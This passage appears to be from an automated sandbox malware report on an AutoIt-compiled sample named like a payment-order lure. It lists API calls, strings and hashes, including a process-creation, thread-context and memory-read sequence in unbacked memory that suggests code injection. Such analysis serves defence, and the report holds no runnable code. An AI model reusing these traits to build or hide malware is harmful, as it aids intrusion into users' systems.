                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F6979B
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F697AC
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F697BE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                    • String ID:
                                    • API String ID: 1500180987-0
                                    • Opcode ID: 92cfb0e6e7acfbd69f4bf960f5f81fd56c9d89c7b233230d112f401b658e6095
                                    • Instruction ID: 538caea13312ff3341ae0a12cb85e2e40bbb047452c6f237b6e71dc040581dd8
                                    • Opcode Fuzzy Hash: 92cfb0e6e7acfbd69f4bf960f5f81fd56c9d89c7b233230d112f401b658e6095
                                    • Instruction Fuzzy Hash: A5C14BB1D00229AECF21DF94CC85ADEB7BDEF45310F0040AAF609E7151DB749A84AF65

                                    APIs
                                      • Part of subcall function 00F04864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FC62F8,?,00F037C0,?), ref: 00F04882
                                      • Part of subcall function 00F2074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F072C5), ref: 00F20771
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F07308
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F3ECF1
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F3ED32
                                    • RegCloseKey.ADVAPI32(?), ref: 00F3ED70
                                    • _wcscat.LIBCMT ref: 00F3EDC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 2673923337-2727554177
                                    • Opcode ID: 09616799c7a926800b6354c339456e11cb020408f68a3bffd3f1175cb21ef58f
                                    • Instruction ID: a4d20f4bb44f4af0251dd9f0bb8751428cc962eaf742506ae1633b41abec4cc2
                                    • Opcode Fuzzy Hash: 09616799c7a926800b6354c339456e11cb020408f68a3bffd3f1175cb21ef58f
                                    • Instruction Fuzzy Hash: 1A7147719093059EC714EF25ED829ABBBA8FF98750F40442EF445831A1EB749948FFA2

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F03A62
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F03A71
                                    • LoadIconW.USER32(00000063), ref: 00F03A88
                                    • LoadIconW.USER32(000000A4), ref: 00F03A9A
                                    • LoadIconW.USER32(000000A2), ref: 00F03AAC
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AD2
                                    • RegisterClassExW.USER32(?), ref: 00F03B28
                                      • Part of subcall function 00F03041: GetSysColorBrush.USER32(0000000F), ref: 00F03074
                                      • Part of subcall function 00F03041: RegisterClassExW.USER32(00000030), ref: 00F0309E
                                      • Part of subcall function 00F03041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F030AF
                                      • Part of subcall function 00F03041: LoadIconW.USER32(000000A9), ref: 00F030F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2880975755-4155596026
                                    • Opcode ID: 179505b090e3d6d752b754cfadc8e15bbc8eec3dd09c639cc27fc7bf484728c8
                                    • Instruction ID: af74beae2c24318cc3ea8c85a5fe263645b8c6ba853cc9cd9ad7409d9faf146e
                                    • Opcode Fuzzy Hash: 179505b090e3d6d752b754cfadc8e15bbc8eec3dd09c639cc27fc7bf484728c8
                                    • Instruction Fuzzy Hash: DE211971A04308AFEF109FA4EE0AFDD7BB4EB08711F10412AE504E72A0D3BA5654AF94

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                    • API String ID: 1825951767-3513169116
                                    • Opcode ID: 925a84af35994668d0acf97e4caff6c2c8646722738d033ea18e63eb1168186e
                                    • Instruction ID: 91d41c8c55c5eef7ef8eb8f29c1ceb647155aa931b4ffded8e7846312054feb3
                                    • Opcode Fuzzy Hash: 925a84af35994668d0acf97e4caff6c2c8646722738d033ea18e63eb1168186e
                                    • Instruction Fuzzy Hash: 75A13072D142299ACF04EBA0DC91EEEB77DBF14310F400529F512A71D1DB785A09FB61

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F03074
                                    • RegisterClassExW.USER32(00000030), ref: 00F0309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F030AF
                                    • LoadIconW.USER32(000000A9), ref: 00F030F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: 30dff5bee8d4cbbe8333498ecea34c5a4064d3cae0148f2863f5ccac93f522e5
                                    • Instruction ID: 8200f110c63d2beb1b865e184673a0dd1730a55023a088fd629a0936d77a2ef2
                                    • Opcode Fuzzy Hash: 30dff5bee8d4cbbe8333498ecea34c5a4064d3cae0148f2863f5ccac93f522e5
                                    • Instruction Fuzzy Hash: CE3138B1945309AFEB009FA4ED85ADDBBF0FF09310F10412AE590E62A0D7B94585EF51

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F03074
                                    • RegisterClassExW.USER32(00000030), ref: 00F0309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F030AF
                                    • LoadIconW.USER32(000000A9), ref: 00F030F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: dbb4e261d543ae06d9f3bd65bc011d17c12fa66d00d81c05782d5aea42ee5348
                                    • Instruction ID: f36cd995863702ac868f07a01949347603ec89c81146701feb4099e517c6c478
                                    • Opcode Fuzzy Hash: dbb4e261d543ae06d9f3bd65bc011d17c12fa66d00d81c05782d5aea42ee5348
                                    • Instruction Fuzzy Hash: B021A0B191521CAFEB009FA4ED8AADDBBF4FB08710F10412AE911E72A0D7B54548AF91

                                    Control-flow Graph

                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018E2741
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018E2967
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: 40a228ae330d8c6dccb3fb1644613726de4fc0fd5d5ec17983852815de9b42d5
                                    • Instruction ID: fb2dffdadebb5c4b587b5e4914df816c49bc1791fd31f78ccf758dc56ee4d0dc
                                    • Opcode Fuzzy Hash: 40a228ae330d8c6dccb3fb1644613726de4fc0fd5d5ec17983852815de9b42d5
                                    • Instruction Fuzzy Hash: 9EA12870E00219EBDB14DFA8C898BEEBBBAFF49304F208159E515BB280D7759A40CF55

                                    Control-flow Graph

                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A15
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A36
                                    • ShowWindow.USER32(00000000,?,?), ref: 00F03A4A
                                    • ShowWindow.USER32(00000000,?,?), ref: 00F03A53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: c892027179fe437158f71ceac08939d0082f848c861af8282a4aecba30239bdb
                                    • Instruction ID: dffeb81e52ddf346d7801c4763aaed157a3fa56e5eed170a334c0ccbe3fe4937
                                    • Opcode Fuzzy Hash: c892027179fe437158f71ceac08939d0082f848c861af8282a4aecba30239bdb
                                    • Instruction Fuzzy Hash: 83F03A706042987EEF301723AC4AEB73E7DD7C7F50B00002AB900E3171C2B50841EAB0

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 018E2300: Sleep.KERNELBASE(000001F4), ref: 018E2311
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018E255B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 7RNC0I0NAQKMTLNUI9AG29
                                    • API String ID: 2694422964-499658212
                                    • Opcode ID: 7891fbc8e36fbd89c2342ae7726209f4430fcdb81aefd61cd41e34e5016f66e3
                                    • Instruction ID: 250e8d850e7a83894abf5cb63a67fdade6c3c28d44c4b643abf1f5d3f6aef5f5
                                    • Opcode Fuzzy Hash: 7891fbc8e36fbd89c2342ae7726209f4430fcdb81aefd61cd41e34e5016f66e3
                                    • Instruction Fuzzy Hash: 7F618570D14288DAEF11DBE4C858BDEBBB9AF15304F044199E609BB2C1D7B91B44CB66

                                    Control-flow Graph

                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F3D5EC
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • _memset.LIBCMT ref: 00F0418D
                                    • _wcscpy.LIBCMT ref: 00F041E1
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F041F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 3942752672-1585850449
                                    • Opcode ID: cc0ae54340a7557007f302ce160b41ccfd42c7208c0b0e91337a7e4d544f75de
                                    • Instruction ID: f1facbac7d52bc1a8735b9cb926240a387d020b85f7c005fd1c3b7cbe8666331
                                    • Opcode Fuzzy Hash: cc0ae54340a7557007f302ce160b41ccfd42c7208c0b0e91337a7e4d544f75de
                                    • Instruction Fuzzy Hash: AF31C1B180C304AAD721EB60DD46FDB77E8AF44310F10455AF194920E2EB78B648F792
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                    • String ID:
                                    • API String ID: 1559183368-0
                                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction ID: f803e6e5b91c3852aff964b5c6e088e774148f5a020e9f16a0a22c6fbb766290
                                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction Fuzzy Hash: 5E51E371E01B29DFDB248FB9E88466E7BA1EF40B30F248329F835962D0D7749D54AB40
                                    APIs
                                      • Part of subcall function 00F04F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04F6F
                                    • _free.LIBCMT ref: 00F3E68C
                                    • _free.LIBCMT ref: 00F3E6D3
                                      • Part of subcall function 00F06BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06D0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 2861923089-1757145024
                                    • Opcode ID: 853b5e3fd2f9d1ef60265c3f05ed46d3564a6c7ecec421d8453b92f6abccf4f2
                                    • Instruction ID: 54c77f74e9758684e9916f211333439668f15ad9c54978c2d48d7ed88d344823
                                    • Opcode Fuzzy Hash: 853b5e3fd2f9d1ef60265c3f05ed46d3564a6c7ecec421d8453b92f6abccf4f2
                                    • Instruction Fuzzy Hash: DE913B71910219EFCF04EFA4CC919EDB7B4BF18324F144469F815AB2E1EB39A915EB60
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F035A1,SwapMouseButtons,00000004,?), ref: 00F035D4
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F035F5
                                    • RegCloseKey.KERNELBASE(00000000,?,?,00F035A1,SwapMouseButtons,00000004,?,?,?,?,00F02754), ref: 00F03617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
                                    • Instruction ID: 489fb4fa2813a144f41ddc0093fe097a95cf3bc10a380b85a5aa54c51d37f909
                                    • Opcode Fuzzy Hash: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
                                    • Instruction Fuzzy Hash: F5114571A10208BFDB208F64DC80EFEBBBCEF04750F108469E805D7250E6729E44BBA0
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 018E1ABB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018E1B51
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018E1B73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    APIs
                                      • Part of subcall function 00F05045: _fseek.LIBCMT ref: 00F0505D
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AAE
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AC1
                                    • _free.LIBCMT ref: 00F6992C
                                    • _free.LIBCMT ref: 00F69933
                                    • _free.LIBCMT ref: 00F6999E
                                      • Part of subcall function 00F22F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29C64), ref: 00F22FA9
                                      • Part of subcall function 00F22F95: GetLastError.KERNEL32(00000000,?,00F29C64), ref: 00F22FBB
                                    • _free.LIBCMT ref: 00F699A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                    • String ID:
                                    • API String ID: 2782032738-0
                                    APIs
                                    • _memset.LIBCMT ref: 00F3EE62
                                    • 75D3D0D0.COMDLG32(?), ref: 00F3EEAC
                                      • Part of subcall function 00F048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F048A1,?,?,00F037C0,?), ref: 00F048CE
                                      • Part of subcall function 00F209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F209F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: NamePath$FullLong_memset
                                    • String ID: X
                                    • API String ID: 3051022977-3081909835
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __fread_nolock_memmove
                                    • String ID: EA06
                                    • API String ID: 1988441806-3962188686
                                    APIs
                                      • Part of subcall function 00F2594C: __FF_MSGBANNER.LIBCMT ref: 00F25963
                                      • Part of subcall function 00F2594C: __NMSG_WRITE.LIBCMT ref: 00F2596A
                                      • Part of subcall function 00F2594C: RtlAllocateHeap.NTDLL(01970000,00000000,00000001), ref: 00F2598F
                                    • std::exception::exception.LIBCMT ref: 00F2102C
                                    • __CxxThrowException@8.LIBCMT ref: 00F21041
                                      • Part of subcall function 00F287DB: RaiseException.KERNEL32(?,?,00000000,00FBBAF8,?,00000001,?,?,?,00F21046,00000000,00FBBAF8,00F09FEC,00000001), ref: 00F28830
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID: bad allocation
                                    • API String ID: 3902256705-2104205924
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F69B82
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F69B99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
